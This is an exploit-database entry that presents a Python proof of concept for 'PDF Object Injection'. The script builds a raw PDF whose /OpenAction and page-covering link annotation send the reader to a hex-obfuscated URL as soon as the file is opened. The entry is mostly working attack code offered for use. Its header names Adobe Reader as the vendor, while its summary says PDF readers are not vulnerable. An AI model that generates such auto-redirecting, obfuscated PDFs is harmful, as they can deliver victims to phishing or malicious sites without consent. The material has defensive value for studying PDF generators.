Share
## https://sploitus.com/exploit?id=PACKETSTORM:216219
=============================================================================================================================================
    | # Title     : PDF Object Injection Vulnerability โ€“ Impact on PDF Readers                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://get.adobe.com/reader/                                                                                               |
    =============================================================================================================================================
    
    [+] Summary    : PDF Object Injection is a vulnerability in applications that dynamically generate PDFs from user input without proper validation or escaping. 
                     An attacker can inject PDF objects (e.g., /OpenAction, /URI, or JavaScript), potentially creating malicious PDFs that perform automatic link redirects, execute scripts, or modify metadata. 
                     This vulnerability exists in the PDF-generating application, not in PDF readers like Adobe Acrobat, Chrome, or Firefox. Proper input sanitization, escaping, and secure PDF libraries prevent this issue
    
    [+] Note  :     that you do not need external libraries such as jsPDF.
                    The same exploit works with the jsPDF library.
    
    [+] POC   :  
    
    import os
    
    def create_raw_obfuscated_pdf(filename, target_url):
    
        hex_url = "".join([f"{ord(c):02x}" for c in target_url])
        hex_payload = f"<{hex_url}>"
    
        pdf_content = (
            f"%PDF-1.7\n"
            f"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n" 
            f"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
            f"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>\nendobj\n"
            f"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0] /A 5 0 R >>\nendobj\n" 
            f"5 0 obj\n<< /S /URI /URI {hex_payload} >>\nendobj\n" 
            f"xref\n0 6\n0000000000 65535 f\n0000000010 00000 n\n0000000079 00000 n\n"
            f"0000000139 00000 n\n0000000220 00000 n\n0000000318 00000 n\ntrailer\n"
            f"<< /Size 6 /Root 1 0 R >>\nstartxref\n400\n%%EOF"
        )
    
        try:
    
            with open(filename, "wb") as f:
                f.write(pdf_content.encode('latin-1'))
            print("-" * 50)
            print(f" Raw file created (No libraries used): {filename}")
            print(f" Obfuscated link inside the file: {hex_payload}")
            print("-" * 50)
        except Exception as e:
            print(f" Write error: {e}")
    
    if __name__ == "__main__":
    
        desktop = os.path.join(os.environ['USERPROFILE'], 'Desktop')
        file_path = os.path.join(desktop, "Pure_Raw_Exploit.pdf")
    
        target = "https://packetstorm.news"
        
        create_raw_obfuscated_pdf(file_path, target)
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================